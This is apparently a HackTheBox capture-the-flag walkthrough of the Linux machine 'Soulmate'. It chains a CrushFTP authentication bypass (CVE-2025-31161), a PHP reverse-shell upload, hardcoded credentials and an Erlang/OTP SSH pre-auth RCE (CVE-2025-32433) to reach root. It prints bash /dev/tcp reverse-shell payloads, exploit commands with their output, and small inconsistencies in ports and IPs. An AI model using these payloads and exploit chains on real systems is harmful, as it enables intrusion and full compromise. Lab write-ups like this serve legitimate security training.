HackTheBox Soulmate Walkthrough
HackTheBox — Soulmate Writeup
Difficulty: Easy OS: Linux
IP: 10.10.11.85
CVEs Exploited: CVE-2025-31161 · CVE-2025-32433
Synopsis
Soulmate is an Easy-rated Linux machine that chains two CVEs to achieve full root compromise. The attack path involves:
- Discovering a CrushFTP instance via vhost enumeration
- Exploiting CVE-2025-31161 (CrushFTP auth bypass) to create a rogue admin account
- Resetting
ben’s password, logging into the FTP share, and uploading a PHP reverse shell to the web root - Escalating to root via CVE-2025-32433 (Erlang/OTP SSH RCE) on a locally-bound SSH service
Enumeration
Nmap
1
nmap -sV -sV -v -p- 10.10.11.85
1
2
3
4
5
6
7
8
9
10
11
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://soulmate.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 redirects to http://soulmate.htb — add the entry to /etc/hosts:
1
10.10.11.85 soulmate.htb
Directory listing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
dirsearch -u http://soulmate.htb
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Target: http://soulmate.htb/
[16:42:53] Starting:
[16:43:40] 403 - 564B - /assets/
[16:43:40] 301 - 178B - /assets -> http://soulmate.htb/assets/
[16:43:56] 302 - 0B - /dashboard.php -> /login
[16:44:21] 200 - 8KB - /login.php
[16:44:22] 302 - 0B - /logout.php -> login.php
[16:44:46] 302 - 0B - /profile.php -> /login
[16:44:50] 200 - 11KB - /register.php
Task Completed
The web app is a dating site with /register.php and /login.php. There is a image uploads functionality. and filter png,jpg,gif. tryed with file uplaod vulnerablity. It’s mostly a dead end, so we move on to vhost enumeration.
Virtual Host Discovery
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
ffuf -w /home/kali/Desktop/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://soulmate.htb" -H "Host : FUZZ.soulmate.htb" -fs 154
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://soulmate.htb
:: Wordlist : FUZZ: /home/kali/Desktop/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.soulmate.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 154
________________________________________________
ftp [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 157ms]
:: Progress: [4989/4989] :: 99 req/sec :: Duration: [0:00:13] :: Error: 0 ::
Found: ftp.soulmate.htb → Update /etc/hosts:
1
10.10.11.85 soulmate.htb ftp.soulmate.htb
Navigating to http://ftp.soulmate.htb reveals a CrushFTP login page. It reveals version of it. Checking browser DevTools network requests shows JS files versioned 11.W.657-2025_03_08_07_52, confirming this is CrushFTP 11 built in March 2025.
Foothold — CVE-2025-31161 (CrushFTP Auth Bypass)
CrushFTP 11 (pre-patch, March 2025) is vulnerable to an authentication bypass that allows creation of arbitrary admin accounts without valid credentials.
PoC: https://github.com/Immersive-Labs-Sec/CVE-2025-31161
Since CrushFTP runs as a vhost, patch the exploit to set the correct Host header:
1
2
3
4
5
6
headers = {
"Host": "ftp.soulmate.htb",
"Cookie": "currentAuth=31If; CrushAuth=...",
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
...
}
Run the exploit:
1
2
3
4
5
python3 CVE-2025-31161.py \
--target_host 10.10.11.85 \
--port 80 \
--new_user attacker \
--password 'attacker123!'
1
2
3
[+] User created successfully!
[*] Username: attacker
[*] Password: attacker123!
Log in as the newly created admin account. Under Admin → User Manager, we see a list of users including ben. Click on ben → Generate Random Password → Save.
Now log back in as ben with the newly set password.
PHP Webshell Upload → RCE
As ben, an FTP share called webProd is accessible — it maps directly to the soulmate.htb web root (contains index.php, login.php, dashboard.php, etc.).
Create a PHP reverse shell:
1
<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/12345 0>&1'"); ?>
Upload shell.php via the CrushFTP web interface into the webProd folder.
Start a listener and trigger it:
1
2
nc -lvnp 9090
curl http://soulmate.htb/shell.php
1
2
3
4
5
6
rlwrap nc -lvnp 12345
listening on [any] 12345 ...
connect to [10.10.16.37] from (UNKNOWN) [10.10.11.86] 35264
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
We have a shell as www-data.
Lateral Movement — www-data → ben
During enumeration, inspect the Erlang login scripts:
1
cat /usr/local/lib/erlang_login/start.escript
Inside, the Erlang SSH OTP daemon configuration reveals hardcoded credentials:
1
{user_passwords, [{"ben", "HouseH0ldings998"}]}
SSH in as ben:
1
2
ssh ben@soulmate.htb
# Password: HouseH0ldings998
Grab the user flag:
1
cat ~/user.txt
Privilege Escalation — CVE-2025-32433 (Erlang/OTP SSH RCE)
Enumeration
1
ss -tlnp
1
LISTEN 127.0.0.1:2222 (Erlang SSH OTP daemon)
Identifying the Version
Forward the port locally:
1
ssh -L 2222:127.0.0.1:2222 -N ben@soulmate.htb
Scan with nmap:
1
nmap -p 2222 -sV -sC 127.0.0.1
1
2222/tcp open ssh SSH-2.0-Erlang/5.2.9
Erlang/OTP SSH version 5.2.9 is vulnerable to CVE-2025-32433, a pre-authentication remote command execution flaw.
Exploitation
Download a public PoC for CVE-2025-32433, start a listener, and execute:
1
2
3
4
5
6
nc -lvnp 9090
python3 exploit.py \
--target 127.0.0.1 \
--port 2222 \
--command "bash -c 'bash -i >& /dev/tcp/YOUR_IP/9090 0>&1'"
1
2
[+] Received banner: SSH-2.0-Erlang/5.2.9
[✓] Exploit sent! Command executed.
1
2
root@soulmate:/# id
uid=0(root) gid=0(root) groups=0(root)
Grab the root flag:
1
cat /root/root.txt
Attack Chain Summary
1
2
3
4
5
6
7
8
9
10
11
12
13
[Recon] nmap → ports 22, 80
↓
[vhost enum] ffuf → ftp.soulmate.htb (CrushFTP 11)
↓
[CVE-2025-31161] Auth bypass → rogue admin account
↓
[User Manager] Reset ben's password → access webProd share
↓
[RCE] Upload PHP shell → www-data shell
↓
[Creds] Hardcoded password in Erlang script → SSH as ben → user.txt
↓
[CVE-2025-32433] Erlang/OTP SSH 5.2.9 RCE → root shell → root.txt
Key Takeaways
- Vhost enumeration is critical — the real attack surface was hidden behind a subdomain
- CrushFTP had a severe auth bypass (CVE-2025-31161) allowing full admin access without credentials
- Hardcoded passwords in application scripts are a common way to pivot between users
- Erlang/OTP SSH servers are uncommon in CTFs but carry real critical CVEs — always fingerprint SSH banners
- Assumed breach credentials (
jenna) provided an entry point for reconnaissance, but the actual exploit chain didn’t require them
Tools & References
| Tool / CVE | Purpose |
|---|---|
nmap | Port & service enumeration |
ffuf | Virtual host discovery |
| CVE-2025-31161 | CrushFTP 11 auth bypass → admin account creation |
| CrushFTP Web UI | Password reset, file upload |
nc / bash reverse shell | RCE via PHP webshell |
| CVE-2025-32433 | Erlang/OTP SSH 5.2.9 pre-auth RCE |
ssh -L | Local port forwarding |
Happy hacking!